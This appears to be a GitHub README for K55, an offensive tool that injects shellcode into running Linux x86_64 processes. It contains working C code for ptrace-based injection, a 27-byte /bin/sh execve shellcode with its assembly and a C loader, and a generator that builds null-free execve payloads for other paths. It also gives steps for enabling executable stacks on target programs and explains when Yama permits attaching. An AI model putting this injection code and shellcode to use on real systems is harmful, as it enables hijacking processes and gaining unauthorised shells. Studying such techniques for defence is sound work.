Linux x86_64 Process Injection Utility | Manipulate Processes With Customized Payloads (beta)

Overview

K55 - Linux x86_64 Process Injection Utility (C++11)


About K55

(pronounced: "kay fifty-five")
The K55 payload injection tool injects x86_64 shellcode payloads into running processes. It is written in modern C++11 and uses traditional Linux C calls such as ptrace() to attach to the target and write the payload into its memory. The payload written into the target process is 27 bytes long and executes /bin/sh (it spawns a shell) within the target's address space. In the future, I will allow users to supply their own shellcode via command line arguments.

Installation

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

K55 Usage

Usage: ./K55 <process-name>

  • process-name can be any running Linux process that has an executable region to write into (shown as r-xp in /proc/<pid>/maps) or whose stack has been made executable with execstack.

Tests

Test 1) In one terminal (from the K55/ directory), run the target: ./k55_example_process/k55_test_process
Test 2) In another terminal, run the injector as root: sudo ./K55 k55_test_process

K55 In Action

  • A shell is spawned in k55_test_process when the K55 shellcode injector is run (as root).

[Screenshots: injecting into the given process; shell spawned in the target]

Limitations

Obviously, ptrace(PTRACE_POKETEXT, ...) calls are not the most discreet way to write into a process, so some applications (and some system policies) can limit the effect of K55. Two things to check before testing:

  • Yama: K55 attaches to a process that is not its own child, so with kernel.yama.ptrace_scope=1 (the default on many distributions) it has to run as root or with CAP_SYS_PTRACE, and with ptrace_scope=3 attaching is impossible. That is why the tests run the injector with sudo.
  • Executable stack: for security testing, make sure to turn on execstack for your target applications. For example, when testing against gdb, run the following before injecting: sudo execstack -s /usr/bin/gdb. Install execstack from your distribution's package manager; for Arch Linux users, execstack is available on the AUR.
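
The injection step K55 performs with ptrace(), as an added example that is not K55's own code: a minimal tracer that stops a target, reads its registers, writes a payload over the instruction bytes at the current RIP with PTRACE_POKETEXT, and resumes it. To keep the result observable without a terminal, the constructed payload below is a 12-byte exit(42) stub rather than the /bin/sh payload, and the target is a forked child that asks to be traced (PTRACE_TRACEME) instead of a process found by name with PTRACE_ATTACH, so the example also runs unprivileged under Yama ptrace_scope=1. The function and payload names are mine.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed demo payload (not K55's): exit(42), so the outcome is visible
 * as an exit status instead of needing a tty for /bin/sh. */
static const unsigned char exit42_payload[] = {
    0xbf, 0x2a, 0x00, 0x00, 0x00,   /* mov edi, 42          */
    0xb8, 0x3c, 0x00, 0x00, 0x00,   /* mov eax, 60 (SYS_exit) */
    0x0f, 0x05                      /* syscall              */
};

/* Copy len bytes into the tracee at addr, one machine word per POKETEXT.
 * The tail word is read first with PEEKTEXT so the bytes after the payload
 * keep their old value. ptrace writes through read-only executable mappings
 * (the kernel takes a private copy), which is why r-xp regions are usable. */
static int poke_bytes(pid_t pid, unsigned long addr, const unsigned char *buf, size_t len)
{
    for (size_t off = 0; off < len; off += sizeof(long)) {
        unsigned long word = 0;
        size_t chunk = len - off;
        if (chunk > sizeof(long)) chunk = sizeof(long);
        if (chunk < sizeof(long)) {
            errno = 0;
            long old = ptrace(PTRACE_PEEKTEXT, pid, (void *)(addr + off), NULL);
            if (old == -1 && errno != 0) return -1;
            word = (unsigned long)old;
        }
        memcpy(&word, buf + off, chunk);   /* little-endian: low bytes land first */
        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + off), (void *)word) == -1)
            return -1;
    }
    return 0;
}

/* Overwrite the code at the stopped tracee's RIP and let it run. Returns the
 * tracee's exit status (128+signal if it was killed), or -1 on ptrace errors. */
static int inject_into_stopped(pid_t pid, const unsigned char *payload, size_t len)
{
    struct user_regs_struct regs;
    if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) == -1) return -1;
    /* The tracee stopped right after its kill() syscall returned, so RIP is
     * the next instruction it will execute: that is where the payload goes. */
    if (poke_bytes(pid, (unsigned long)regs.rip, payload, len) == -1) return -1;
    /* Resume with signal 0 so the SIGSTOP that parked it is swallowed. */
    if (ptrace(PTRACE_CONT, pid, NULL, (void *)0) == -1) return -1;
    for (;;) {
        int status;
        if (waitpid(pid, &status, 0) == -1) return -1;
        if (WIFEXITED(status)) return WEXITSTATUS(status);
        if (WIFSIGNALED(status)) return 128 + WTERMSIG(status);
        /* Unrelated stop: pass the signal through unchanged. */
        if (ptrace(PTRACE_CONT, pid, NULL, (void *)(long)WSTOPSIG(status)) == -1) return -1;
    }
}

/* Spawn a cooperating target, inject into it, and report what it did.
 * K55 instead PTRACE_ATTACHes to a process found by name, which under Yama
 * ptrace_scope=1 needs root or CAP_SYS_PTRACE. */
int inject_into_child(const unsigned char *payload, size_t len)
{
    pid_t pid = fork();
    if (pid == -1) return -1;
    if (pid == 0) {
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) _exit(127);
        kill(getpid(), SIGSTOP);   /* park here until the tracer resumes us */
        for (;;) pause();          /* never reached once the payload runs */
    }
    int status;
    if (waitpid(pid, &status, 0) == -1 || !WIFSTOPPED(status)) {
        kill(pid, SIGKILL);
        waitpid(pid, NULL, 0);
        return -1;
    }
    int rc = inject_into_stopped(pid, payload, len);
    if (rc == -1) { kill(pid, SIGKILL); waitpid(pid, NULL, 0); }
    return rc;
}

/* 1 when the demo payload ran (exit status 42), 0 on any other exit,
 * -1 when ptrace itself was refused (seccomp, Yama scope 3, ...). */
int demo_exit42(void)
{
    int rc = inject_into_child(exit42_payload, sizeof exit42_payload);
    if (rc == -1) return -1;
    return rc == 42;
}

int main(void)
{
    int rc = inject_into_child(exit42_payload, sizeof exit42_payload);
    if (rc == -1) { fprintf(stderr, "injection failed: ptrace unavailable?\n"); return 1; }
    printf("target exited with status %d (expected 42)\n", rc);
    return rc == 42 ? 0 : 1;
}
```

Swapping K55's 27-byte /bin/sh string in for exit42_payload gives the tool's behaviour (the child turns into a shell reading the tracer's stdin). The partial-tail handling in poke_bytes is what keeps the write at exactly the payload's size: POKETEXT moves whole words, so a naive loop would also overwrite the bytes after the payload.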

Crafting The Shell Payload

Note: The following is a demonstration; the payload string is already hardcoded into K55.

Assembly Implementation of The Payload (Intel syntax; cited from shell-storm, shellcode-806)

main:
    xor eax, eax                  ; rax = 0 (writing eax clears the upper 32 bits too)
    mov rbx, 0xFF978CD091969DD1   ; the negation of "/bin/sh\0": the immediate itself contains no 0x00 byte
    neg rbx                       ; rbx = 0x0068732F6E69622F = "/bin/sh\0" (little-endian)
    push rbx                      ; put the string on the stack
    push rsp
    pop rdi                       ; rdi = pointer to "/bin/sh" (execve filename)
    cdq                           ; edx = sign of eax = 0, so rdx = 0 (envp = NULL)
    push rdx                      ; argv[1] = NULL
    push rdi                      ; argv[0] = "/bin/sh"
    push rsp
    pop rsi                       ; rsi = argv
    mov al, 0x3b                  ; rax = 59 = SYS_execve
    syscall

C-Implementation of The Payload

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

// Shellcode breakdown of the assembly code (27 bytes, no 0x00 byte inside).
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%zu bytes\n", strlen(code));
    // code lives in a writable, non-executable data page, so make the page(s)
    // holding it executable before jumping into it. The classic `gcc -z execstack`
    // trick used to make this implicit, but on current x86_64 kernels an
    // executable stack no longer makes data pages executable.
    uintptr_t page = (uintptr_t)code & ~((uintptr_t)sysconf(_SC_PAGESIZE) - 1);
    if (mprotect((void *)page, ((uintptr_t)code - page) + sizeof(code),
                 PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }
    (*(void(*)()) code)();   // execve replaces this process with /bin/sh
    return 0;
}
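
The neg trick and the stack layout above, generalized as an added example (my code, not K55's or shell-storm's): pack_path() and build_execve_shellcode() produce the same 27 bytes for any executable path of up to seven characters, refusing paths that would leave a 0x00 byte in the encoding, and decode_neg_imm() recovers the string hidden behind a mov/neg pair so the immediate in a listing can be checked rather than trusted. The reference array k55_shellcode is the byte string from the page; the function names are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* K55's hardcoded payload, copied from the page, used as the reference the
 * builder is checked against. */
static const unsigned char k55_shellcode[27] = {
    0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff,
    0x48, 0xf7, 0xdb, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e,
    0xb0, 0x3b, 0x0f, 0x05
};

/* Pack a path of at most 7 characters plus its NUL into one little-endian
 * qword, which is the layout `push rbx` leaves in memory as a C string. */
static int pack_path(const char *path, uint64_t *out)
{
    size_t n = strlen(path);
    if (n == 0 || n > 7) return -1;          /* the NUL must fit in 8 bytes */
    unsigned char buf[8] = {0};
    memcpy(buf, path, n);
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | buf[i];
    *out = v;
    return 0;
}

/* Recover the string a `mov rbx, imm ; neg rbx` pair pushes: negate the
 * immediate (two's complement, like neg) and read it as little-endian bytes. */
void decode_neg_imm(uint64_t imm, char out[9])
{
    uint64_t v = (uint64_t)0 - imm;
    for (int i = 0; i < 8; i++) out[i] = (char)(v >> (8 * i));
    out[8] = '\0';
}

/* Emit the 27-byte execve(path, {path, NULL}, NULL) payload for `path`.
 * Returns the length, or -1 if the path does not fit or the encoding would
 * contain a 0x00 byte (which a C-string copy of the payload would truncate). */
int build_execve_shellcode(const char *path, unsigned char out[27])
{
    uint64_t packed;
    if (pack_path(path, &packed) == -1) return -1;
    uint64_t imm = (uint64_t)0 - packed;     /* neg rbx undoes this at runtime */
    size_t n = 0;
    out[n++] = 0x31; out[n++] = 0xc0;                  /* xor eax, eax            */
    out[n++] = 0x48; out[n++] = 0xbb;                  /* mov rbx, imm64          */
    for (int i = 0; i < 8; i++) out[n++] = (unsigned char)(imm >> (8 * i));
    out[n++] = 0x48; out[n++] = 0xf7; out[n++] = 0xdb; /* neg rbx                 */
    out[n++] = 0x53;                                   /* push rbx   ("path\0")   */
    out[n++] = 0x54; out[n++] = 0x5f;                  /* push rsp ; pop rdi      */
    out[n++] = 0x99;                                   /* cdq  -> rdx = 0 (envp)  */
    out[n++] = 0x52;                                   /* push rdx  (argv[1])     */
    out[n++] = 0x57;                                   /* push rdi  (argv[0])     */
    out[n++] = 0x54; out[n++] = 0x5e;                  /* push rsp ; pop rsi      */
    out[n++] = 0xb0; out[n++] = 0x3b;                  /* mov al, 59 (SYS_execve) */
    out[n++] = 0x0f; out[n++] = 0x05;                  /* syscall                 */
    for (size_t i = 0; i < n; i++)
        if (out[i] == 0) return -1;                    /* would not survive strcpy */
    return (int)n;
}

int main(void)
{
    unsigned char sc[27];
    char path[9];
    decode_neg_imm(0xFF978CD091969DD1ULL, path);
    printf("mov/neg immediate decodes to: %s\n", path);
    int n = build_execve_shellcode("/bin/sh", sc);
    printf("built %d bytes, identical to K55's payload: %s\n", n,
           (n == 27 && memcmp(sc, k55_shellcode, 27) == 0) ? "yes" : "no");
    for (int i = 0; i < n; i++) printf("\\x%02x", sc[i]);
    printf("\n");
    return 0;
}
```

The 7-character limit is inherent to the single-qword trick; a longer path needs a second push (and a second negated immediate) before the `push rsp ; pop rdi` pair, which the 27-byte layout does not have room for.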

References

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097

License

MIT License
Copyright (c) Josh Schiavone

Releases: v1.2
Owner: Josh Schiavone (Programmer, Offensive Security Researcher, Reverse Engineer, Founder of DoubleThreat Security)